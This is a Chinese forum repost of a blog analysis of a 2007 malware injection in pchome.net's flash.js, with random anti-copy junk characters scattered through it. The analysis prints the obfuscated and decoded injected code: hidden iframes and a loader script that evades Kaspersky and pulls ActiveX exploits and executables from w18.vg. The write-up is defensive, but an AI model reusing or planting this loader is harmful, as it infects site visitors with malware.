该用户从未签到
|
截至2007-12-28 18:17 仍未修复
8 H1 n" a* m* }& B( @9 v7 Y7 r- @+ s1 F# ]; L+ |6 J8 ]. n* Z
0 R" Y0 D( Y. k* B3 o" V$ `
##I#KE+X#D=$I#KE+XDI=KE+=X++D$IK#E#X+DI$KE+X=D=IK$E+$X=$D#I+$KEX$#DI+K#EXD=IKE+X#D#=I==K+E==XD+I#K$E$#X$D##I
: h0 \& d4 x/ R$ t, y: f5 b
1 V: t$ G& E: ?2 q+ P V8 x从论坛看到的消息说pchome的某页面被挂马了,于是上去找,http://article.pchome.net/content-502393-7.html#topView' L- m$ m# Z/ n0 b8 C+ v
5 V7 \# J2 U# w" U5 J$ j
挂得比较隐蔽,http://btn.pchome.net/flash.js的中间被加入了如下代码:, I: E. i6 v7 q5 Z: H* O# \. l
8 F5 b! U' z7 f: \: bwindow["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]('\x3c\x69\x66\x72\x61\x6d\x65 \x68\x65\x69\x67\x68\x74\x3d\x30 \x77\x69\x64\x74\x68\x3d\x30 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x35\x39\x2e\x76\x63\x2f\x70\x61\x67\x65\x2f\x61\x64\x64\x5f\x36\x34\x34\x34\x35\x35\x2e\x68\x74\x6d\x22\x3e\x3c\x2f\x69\x66\x72\x61\x6d\x65\x3e');
1 A6 v: w" b) u
8 h7 q# J/ q6 b也就是这个了:/ N7 m" N# v% ~& w
. o2 W6 s3 p5 p5 h; Z5 swindow["document"]["writeln"]('<iframe height=0 width=0 src="http://www.59.vc/page/add_644455.htm"></iframe>');# g1 c, X. c# L! B
3 O7 o4 Y3 j, I6 a; b
但只有这个js还不会使得那个iframe生效,使得他生效的是调用这个js显示flash 的代码:
0 D' d9 V: @; G. Z8 C- X
6 R/ k0 _& e& _<script language="javascript" type="text/javascript">2 i# d, u! o- { q+ @
writeflashhtml("_swf=http://btn.pchome.net/pchome/20071217/300_250.swf", "_width=300", "_height=250" ,"_wmode=opaque");9 |' X% T0 o0 U3 E7 ]
</script>& W. N; C, c& ?- c! ^. F/ E
/ ~# C4 N# O5 c9 ^2 h2 N% \有了这个,iframe就生效了;经过一番调用和解密后得:7 p; e6 s5 j7 i
* F! h' L" q& Vfunction bIsKIS(){for(i=2;i<26;i++){var kis6=new Image();var kis7=new Image();var root=String.fromCharCode(65+i);kis6.src="mkMSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\Doc\\context.chm::/images/help.gif";kis7.src="mkMSITStore:"+root+":\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\Doc\\context.chm::/images/help.gif";if(kis6.height==41||kis7.height==41)return true}return false}var Then=new Date();aaxxx="xxxyyyyfassssfsadfasdf";Then.setTime(Then.getTime()+24*60*60*1000);var aaffdasfascookie=new String(document.cookie);var cookieHeader="Cookie1=";aaxxx="xxxyyyyfassssfsadfasdf";if(!bIsKIS()&&aaffdasfascookie.indexOf(cookieHeader)==-1){aaxxx="xxxyyyyfassssfsadfasdf";document.cookie="Cookie1=POPWINDOS;expires="+Then.toGMTString();aaxxx="xxxyyyyfassssfsadfasdf";try{if(new ActiveXObject("IERPCtl.IERPCtl.1"))document.write('<iframe style=display:none src="http://w18.vg/real.gif"></iframe>')}catch(e){}try{if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)document.write('<iframe style=display:none src="http://w18.vg/ms.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe style=display:none src="http://w18.vg/xl.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))document.write('<iframe style=display:none src="http://w18.vg/lz.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("MPS.StormPlayer.1"))document.write('<iframe style=display:none src="http://w18.vg/bf.gif"></iframe>')}catch(e){}try{if(new ActiveXObject("BaiduBar.Tool.1"))document.write('<iframe style=display:none src="http://w18.vg/baidu.gif"></iframe>')}catch(e){}}
+ w {+ [8 x; M5 I& g; k& @* S* @5 {( W' d Z
K##E+XD++IK+EX=#D$IKEXD+$I#KEXDI+K$EX$DI$$KE##X#DI=K+E$X=$DI#K+#EX=DIK=E$=XDIK=$EX=DIK$E$#X=D=I##KE#=X+$D+
2 ~3 U8 { d( G/ d3 B! @6 {8 J* X( S h! ~+ r1 c4 ?
% }6 U+ r% e2 i9 I' W6 r, j
挑了几个解密得:http://w18.vg/s.exe: w4 U0 ]; i/ T& {# i+ }
s! p+ _2 V) h3 g3 _/ l1 D/ J1 O
从这个文件里面得到另外一个链接:http://w18.vg/ss.exe
! @( e8 X& o9 e3 \
\; a, y: ^% E1 x' x1 L5 V: T有点面熟的东西……1 i2 o* s7 U- U5 g- D( c0 Y
8 i! \3 R* @$ p8 g' U" J. C
##K=E#X+D=IKE$XD$=I==K+#EXD=#I=KE$+XDI#K$=EX=D=#IK+E=X$D==I=#K=E##X$D$+IK=#EXD+IK$EX$=D+I+K#E$XD+IKEX#D
. v$ o* w' v4 n6 ~: j% K
- i0 \" X2 s2 i7 r$ A8 k从上面可以知道,出问题的是那个flash.js,因此所有使用这个js来放flash的页面全都有毒了!我随便找了几个页面,发现都是有毒的,这回可是大面积的被挂咯,同志们自己小心了。
+ x) v$ B& K: Z$ B; f
3 T3 b3 x9 V$ [" i. v9 ` d: \1 cK$EX=+DI#$KE+X#DIK$EXD$I=KE$XD+#I+KEXD=I+KE=X$D=I=KEXD#=IK==E$X=D=I#+KEXD=IK#EX#DI=K=E=X=#DIKEXDI#KE# v/ v9 O2 Q: ?4 _- s6 r
- D4 Q. q4 Q" ^$ b
转载请保留声明!(http://hi.baidu.com/dikex/blog/item/36300afa339a8c889e5146f5.html)
0 e7 a5 i2 A# [. M b
7 \! K& B1 X L. c' K" \8 C" s
h; y) d8 J( H" m作者dikex(六翼刺猬),原文链接:http://hi.baidu.com/dikex/blog/item/92f804c70762ead8d10060ff.html |
|